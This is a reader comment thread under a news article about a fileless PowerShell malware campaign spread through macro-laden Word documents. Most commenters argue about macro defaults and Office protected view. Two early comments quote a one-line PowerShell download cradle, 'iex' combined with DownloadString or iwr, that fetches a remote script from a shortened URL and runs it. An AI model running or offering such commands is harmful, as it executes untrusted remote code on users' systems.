back to article Attackers packing malware into PowerShell

Microsoft's PowerShell has once again become an attack vector for malware, this time a file-less attack dubbed "Powersniff" by Palo Alto Networks. The attack arrives through e-mails containing Word documents bearing malicious macros, almost as if it isn't more than 15 years since the first macro viruses were let loose on the …

  1. Stu J

    The power of PowerShell

    This:

    iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")

    1. TheVogon Silver badge

      Re: The power of PowerShell

      "the user's machine is locked down a bit more tightly"

      Windows is still set to the default settings you mean.

      "advice is to turn off automatic macro execution"

      Or since it's off by default, not to turn it on....

    2. Uffe Seerup

      Re: The power of PowerShell

      > iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")

      a bit shorter:

      iex (iwr http://bit.ly/e0Mw9w)

      awesomeness ensues...

  2. Anonymous Coward
    Meh

    So...

    ...it has to get past your email spam defenses,

    then pass the AV defenses,

    then they have to override Words defenses

    Then override Windows defenses.

    Got it.

    1. hplasm Silver badge
      Meh

      Re: So...

      So...

      ...it has to get past your email spam defenses,

      then pass the AV defenses,

      then it's in.

      FTFY

      1. Uffe Seerup

        Re: So...

        > ...it has to get past your email spam defenses,

        > then pass the AV defenses,

        > then it's in.

        Nope. Delivered through a browser or email client, the Word document file will be tainted with the "internet zone". Upon seeing that, Word will by default open the document in protected view mode.

        What this means is that the process running Word will be running with low integrity mode (same as protected mode in Internet Explorer, same as Google Chromes sandbox on Windows). Macros are disabled in protected view. Even if there was an exploitable memory corruption bug, the Word instance is still sandboxed.

        https://blogs.technet.microsoft.com/office2010/2009/08/13/protected-view-in-office-2010/

  3. Sil

    Unconvincing

    Unconvincing.

    An email including a document with macros won't even be delivered in most enterprises, and most computers in an enterprise setting, even smbs, won't execute macros.

    1. Nick Ryan Silver badge

      Re: Unconvincing

      You'd hope that wouldn't you? Unfortunately the last "finance" company I was in required that macros run in all MS-Word documents, not just the macro enabled versions, due to their normal.dot based MS-Word customisation (aka: unnecessary mangling of standard features).

    2. Pascal Monett Silver badge

      Re: "most computers in an enterprise setting, even smbs, won't execute macros"

      Dear God in Heaven, do I wish that were true.

      Security in SMBs is only as good as the technical know-how of the CEO. If he fancies himself a programmer, or if one of his buddies showed him a Word macro that reveals the picture of a flying pig and he found that funny, you can kiss that notion adieu.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2019